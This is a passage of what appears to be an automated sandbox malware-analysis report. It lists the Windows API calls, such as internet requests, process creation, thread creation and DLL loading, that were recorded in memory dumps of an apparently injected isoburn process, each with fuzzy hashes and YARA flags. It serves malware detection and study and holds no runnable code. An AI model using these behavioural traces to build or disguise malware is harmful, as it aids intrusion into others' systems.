                                                                            • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,?,?,?,?,?), ref: 030259CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HttpOpenRequest
                                                                            • String ID: Http$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                            • API String ID: 1984915467-4071423757
                                                                            • Opcode ID: ed152f6a6868436c0f160e038e6a1ea7d195fecf80de1bb4fa6166c876a39950
                                                                            • Instruction ID: 186b31c8eae92d626ee58901ff56488d350dbad72097d294a3619bd55c051e45
                                                                            • Opcode Fuzzy Hash: ed152f6a6868436c0f160e038e6a1ea7d195fecf80de1bb4fa6166c876a39950
                                                                            • Instruction Fuzzy Hash: B0015EB2905158AFCF00DF98C881DEF7BB9EF48250F158288FD48A7305C630AE11CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 030258CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InternetOpen
                                                                            • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                            • API String ID: 2038078732-3155091674
                                                                            • Opcode ID: dfb678c8f92943d01b7d85fa9f9be9ccfe7264b614b24c50130d97bdf7956ac5
                                                                            • Instruction ID: d58abb130ff840af173f5b8984658d388cb751d56572716c591dda2966149224
                                                                            • Opcode Fuzzy Hash: dfb678c8f92943d01b7d85fa9f9be9ccfe7264b614b24c50130d97bdf7956ac5
                                                                            • Instruction Fuzzy Hash: EA011DB2911128AF8B10DF98DC419FBB7B8FF48310F048589FD18A7241D675AA10CBE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 030258CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InternetOpen
                                                                            • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                            • API String ID: 2038078732-3155091674
                                                                            • Opcode ID: 9399f14bde64643c773783530733c3fd6ff2abecf1c2f87801eee2a4054fbe2f
                                                                            • Instruction ID: e9fbe574e638b7283afa70885f75e5f6a74b7520bdbe36a33c40905992171af5
                                                                            • Opcode Fuzzy Hash: 9399f14bde64643c773783530733c3fd6ff2abecf1c2f87801eee2a4054fbe2f
                                                                            • Instruction Fuzzy Hash: 10F03CB2901128AF8B00DF98D8419FBBBB8FF48300F048589FE186B241D274AA10CBE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 7e327r58$7e327r58
                                                                            • API String ID: 0-4105805501
                                                                            • Opcode ID: 82402712a0b75521e6a14b9bc05d97eac04ab03830922f2e319dfe6e1bd53444
                                                                            • Instruction ID: 5aec7380eb1721b520de45f53b1ed9111ec3e9e79b10c4dcada0111dbadaa8cb
                                                                            • Opcode Fuzzy Hash: 82402712a0b75521e6a14b9bc05d97eac04ab03830922f2e319dfe6e1bd53444
                                                                            • Instruction Fuzzy Hash: 3B41AD3794B289EFD702D7749C419EEBFA8EF81224B18429DE4C08B502D2628597C7C1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 03010997
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: 7e327r58$7e327r58
                                                                            • API String ID: 1836367815-4105805501
                                                                            • Opcode ID: 9349526b6208127e1f10d187c497c14efb34eac3166d3264b5f612306709c727
                                                                            • Instruction ID: d3bdb94083bea5225c57825e6435dada4aec16f43b6975125866c94ba17cd090
                                                                            • Opcode Fuzzy Hash: 9349526b6208127e1f10d187c497c14efb34eac3166d3264b5f612306709c727
                                                                            • Instruction Fuzzy Hash: D801CC76D0125C7EEB11EAD48C81DFF7B7CDF80694F048154FA446B140D6385E468BB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 03010997
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: 7e327r58$7e327r58
                                                                            • API String ID: 1836367815-4105805501
                                                                            • Opcode ID: e486c9899747edec20a59d0c4dc92b630a3ca3456ed4f9838f46d68ac4a78ee6
                                                                            • Instruction ID: a0be4e2f605c8844582a80bdf90d8901c779a745d79c3431b6feec0e6b0fcf52
                                                                            • Opcode Fuzzy Hash: e486c9899747edec20a59d0c4dc92b630a3ca3456ed4f9838f46d68ac4a78ee6
                                                                            • Instruction Fuzzy Hash: 8901BE76D0225C7EEB11DAE58CC1DEF7B7CDF80694F048164FA44AB240D5385E468BB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 0302251B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            • Opcode ID: 7aca81c9b1ad061a9b03743802ed5ffce7ad92d42c2551175fd1bf15eb71ab2f
                                                                            • Instruction ID: 751ad6daf0b4452b3485207663a770e9b7645abee9ed2ffd8a46edf72e25934b
                                                                            • Opcode Fuzzy Hash: 7aca81c9b1ad061a9b03743802ed5ffce7ad92d42c2551175fd1bf15eb71ab2f
                                                                            • Instruction Fuzzy Hash: A931A1B9601704ABD714DFA4D884FA7BBFCEB88300F04862EEA5D9B244D270A554CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 0302251B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            • Opcode ID: b5fa294a1198c32d6f00906cc7d32fa1e79b890f799487c8292c6fa8aa460fd7
                                                                            • Instruction ID: 7c20b3c8701cef09f42b222e558179687e4d6965cda7ca7b4a925fc0e6350f67
                                                                            • Opcode Fuzzy Hash: b5fa294a1198c32d6f00906cc7d32fa1e79b890f799487c8292c6fa8aa460fd7
                                                                            • Instruction Fuzzy Hash: C731D1B8601300BBD714DFA4D885FEAFBB8AF48300F048629EA5C5B285D3706554CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 03018C76
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID: @
                                                                            • API String ID: 3188754299-2766056989
                                                                            • Opcode ID: 7bcecd1175c33e4f32012e69309a147baab56ab4c9266a172cc322f1fb6b83cf
                                                                            • Instruction ID: ddc63a5310a179f7d893d699b8694053bb88e7f684b4d980f7dbc70a37a54aad
                                                                            • Opcode Fuzzy Hash: 7bcecd1175c33e4f32012e69309a147baab56ab4c9266a172cc322f1fb6b83cf
                                                                            • Instruction Fuzzy Hash: 9271A1B6800318ABDB24DB64CCC4FEBB3BCBF94700F044599F5199B141EBB0AB948B61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 0301E527
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID: @J7<
                                                                            • API String ID: 2538663250-2016760708
                                                                            • Opcode ID: 635382d79cff416b9f17ad0bee3dc5975c074b70bb05a18bbdc40a4beb068f7f
                                                                            • Instruction ID: fbeb342d4da06c9e5ea24bb9ca06bd90a13d4bcf2dc9903dc76cab9d8064b79b
                                                                            • Opcode Fuzzy Hash: 635382d79cff416b9f17ad0bee3dc5975c074b70bb05a18bbdc40a4beb068f7f
                                                                            • Instruction Fuzzy Hash: EE312DB5A0020AAFDB00DFD8C8809EFB7B9FF88304B148559E905AB214D775EE05CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 0301E527
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID: @J7<
                                                                            • API String ID: 2538663250-2016760708
                                                                            • Opcode ID: 783327409d9f152e3c77285bf7fa042f4a25fd5df9a05f961e22058e959633af
                                                                            • Instruction ID: 7e2ca47e56991e4fe55ebc388a3d242f54600744223931274f977e6483197961
                                                                            • Opcode Fuzzy Hash: 783327409d9f152e3c77285bf7fa042f4a25fd5df9a05f961e22058e959633af
                                                                            • Instruction Fuzzy Hash: 81312DB5A0020AAFDB00DFD8C8809EEB7B9BF88304B108559E905AB214D775EE05CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(03010DD1,03010DF9,03010BD1,00000000,030175B3,00000010,03010DF9,?,?,00000044,03010DF9,00000010,030175B3,00000000,03010BD1,03010DF9), ref: 03025583
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: c70c70ad0f92251847618d5563fdc75050762b3f3595e7b2f0a82a7b4b7f3631
                                                                            • Instruction ID: 9da61c62a4f43180cfd38e4431cdf5b7e70375ed3a99c6d2abac6c8577d4ec98
                                                                            • Opcode Fuzzy Hash: c70c70ad0f92251847618d5563fdc75050762b3f3595e7b2f0a82a7b4b7f3631
                                                                            • Instruction Fuzzy Hash: 771109B6205258BBDB04EE99DC81EDB77ADEFCC710F448109FA08D7242D630F9118BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 03014192
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: 1fcb73fbd77ef36cb2ce4409c10369b23ff0cc34926120964a4f0ebcc4b86230
                                                                            • Instruction ID: 3d1f3f943366360b0970999dcb7871fe7dea2be4206d5cbc150815fa71aab69b
                                                                            • Opcode Fuzzy Hash: 1fcb73fbd77ef36cb2ce4409c10369b23ff0cc34926120964a4f0ebcc4b86230
                                                                            • Instruction Fuzzy Hash: 2D015EB9E0120DABDB10DBA5DC45FDEB7B89B54308F048194E9089B240F671E7588B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(03010DD1,03010DF9,03010BD1,00000000,030175B3,00000010,03010DF9,?,?,00000044,03010DF9,00000010,030175B3,00000000,03010BD1,03010DF9), ref: 03025583
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: dc30fb65775e73fbda3954eec95ed66d1a2db8f0e204a2e990e2ae94dc159d13
                                                                            • Instruction ID: 1c1be609ed33a8da9d751ac6e37f390227108340bda7fd9620d87a40dcc1a733
                                                                            • Opcode Fuzzy Hash: dc30fb65775e73fbda3954eec95ed66d1a2db8f0e204a2e990e2ae94dc159d13
                                                                            • Instruction Fuzzy Hash: 5301C0B6201248BBDB44DE89DC80EDB77ADAF8C710F408208BA09E7241D630F8518BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030099A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: 8fe21a8186d8c0b22be6d23cc714eb24f848aee8ffd292f2038c5389aab0e4df
                                                                            • Instruction ID: b6b9f3f8c1610a0755427f5463beaed23e2a358256181913040ac5b6fa34cdab
                                                                            • Opcode Fuzzy Hash: 8fe21a8186d8c0b22be6d23cc714eb24f848aee8ffd292f2038c5389aab0e4df
                                                                            • Instruction Fuzzy Hash: FFF0657738231436E770A1A9AC02FD7B78C9BC0775F180026F60CDB1C0D995B84143E5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030099A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: e6af1948fe2b60ec5aad23a07142ef98248ca4a55cf9dfa79fd31cca4be9ade6
                                                                            • Instruction ID: 70950d4648dc608b67694611b05c38d2194db7d9e5dc88bc448497c49f89b2e8
                                                                            • Opcode Fuzzy Hash: e6af1948fe2b60ec5aad23a07142ef98248ca4a55cf9dfa79fd31cca4be9ade6
                                                                            • Instruction Fuzzy Hash: CBF0657B2453143AE270E1599C42FEBB75C9BC0764F244019F608AF1C0DA96784543E5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(03011F66,?,030237E3,03011F66,03023557,030237E3,?,03011F66,03023557,00001000,?,?,03026CA0), ref: 0302547C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                            • Instruction ID: c07a4b96451bcadbcd8fbbe65ab839a03ae0d4ecb0e3a2e2b30d88a0b92e3fd0
                                                                            • Opcode Fuzzy Hash: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                            • Instruction Fuzzy Hash: 3FE06DB5205304BBD614EE58DC41EEB77ACEFC4710F404409F948A7241C671B9108BB4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,23C78BFC,00000007,00000000,00000004,00000000,03013913,000000F0,?,?,?,?,00000000), ref: 030254CF
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: 084c3a0141a29753b9564923c41a14955e4b30b2448ffbc91be334a51728e4f3
                                                                            • Instruction ID: db9d969c88d2a32303d8709a342472c662490ac953d25b5c24c9271c3365bab1
                                                                            • Opcode Fuzzy Hash: 084c3a0141a29753b9564923c41a14955e4b30b2448ffbc91be334a51728e4f3
                                                                            • Instruction Fuzzy Hash: 29E09A762013487FD614EE99DC40FDB37ACEFC8710F408408F908AB241C671B8108BB4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 0301761C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 197c5d411eb6a8b592f346f29c51d7b6835527769e77055f605e3160b1caffff
                                                                            • Instruction ID: d11456fe4f690bb717bd9171a259dce70e45c9e5e4f1cba80e245970cc3d7bdb
                                                                            • Opcode Fuzzy Hash: 197c5d411eb6a8b592f346f29c51d7b6835527769e77055f605e3160b1caffff
                                                                            • Instruction Fuzzy Hash: B8E0807955130417E7A4D56CDC49FA6339C474CB24F1C4670F95CDF1D2D975F5118250
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,03011A2A,030121A9,03023557,00000000), ref: 03017433
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 26a8537f8ec240dea86e513593c943ab9d97c757713fe3b37d291765e484f7b7
                                                                            • Instruction ID: 86f3ee4d4b61f56522471795442b90bfa452e838447a8c1e5a611542a77930c3
                                                                            • Opcode Fuzzy Hash: 26a8537f8ec240dea86e513593c943ab9d97c757713fe3b37d291765e484f7b7
                                                                            • Instruction Fuzzy Hash: FEE026356803003FE790DAF88C05FEA26CCAB903A8F088625F55CDA2D1E611A4144210
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,03011A2A,030121A9,03023557,00000000), ref: 03017433
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: d2a2b4edda2da953367c3c24d5c5aebed2b3062394d9fb6d9458327b5a9b220c
                                                                            • Instruction ID: a1745af7c55fcd50765ee2e686b50132173658fafe83b47c736d401b1b50fb75
                                                                            • Opcode Fuzzy Hash: d2a2b4edda2da953367c3c24d5c5aebed2b3062394d9fb6d9458327b5a9b220c
                                                                            • Instruction Fuzzy Hash: D1D05E792453053BF690EAF48C46F96368C9B407A8F088064F94CDB6C1E955F06042A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3db82a5c7851b6ccb9831fc13c26c01f25b6bea3fc7050edf70f63433234d392
                                                                            • Instruction ID: 61e77646714b9a1c40e095115dc0efd642161bb085a1ad2a917bd428129970c8
                                                                            • Opcode Fuzzy Hash: 3db82a5c7851b6ccb9831fc13c26c01f25b6bea3fc7050edf70f63433234d392
                                                                            • Instruction Fuzzy Hash: 30B09B729025C5C9EE51E7609608B1F7955BBD1701F65C061D3030681F4738C1E1E275
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a0ebee8b487f9b084570e16a6c39ca6229a609df2ac72fc373ae30b58edfc77c
                                                                            • Instruction ID: a7eda380ecf1ce68d0ec0abfd53f4c729532db83709ef95b5d1ebd720ed15e82
                                                                            • Opcode Fuzzy Hash: a0ebee8b487f9b084570e16a6c39ca6229a609df2ac72fc373ae30b58edfc77c
                                                                            • Instruction Fuzzy Hash: 51B0922BE5608812CA208C5E78422F4FB64D3C7631E4472FBEC4CA7202A187D66A55D9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 9857c14d32d74c36f74e2529a37acb7e851f15a72416d1d5a7cd230bf6203674
                                                                            • Instruction ID: ea7bbadb47f3413a801fb371bd15cf7962ee89f938aa7eba843c7cbf8fdcfa1b
                                                                            • Opcode Fuzzy Hash: 9857c14d32d74c36f74e2529a37acb7e851f15a72416d1d5a7cd230bf6203674
                                                                            • Instruction Fuzzy Hash: D951C5BAA04117BFCB64DB98AD9097EFBBDBB08200B648169E465D7641D374DE408BE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 4e9d182d78ff45163d85762afab86cdd25803db48f0c17c10c4840f788bd604a
                                                                            • Instruction ID: 5d738117726de37e571db09d426ffd7d9d3af7387299e7a680a15d7f9938fe8d
                                                                            • Opcode Fuzzy Hash: 4e9d182d78ff45163d85762afab86cdd25803db48f0c17c10c4840f788bd604a
                                                                            • Instruction Fuzzy Hash: 3251F67AA04645EECB34DF5CC8909BFB7FAAB44210B148859E9B6C7641D7B4DE00C760
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05114725
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 051146FC
                                                                            • ExecuteOptions, xrefs: 051146A0
                                                                            • Execute=1, xrefs: 05114713
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05114655
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05114742
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 05114787
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID:
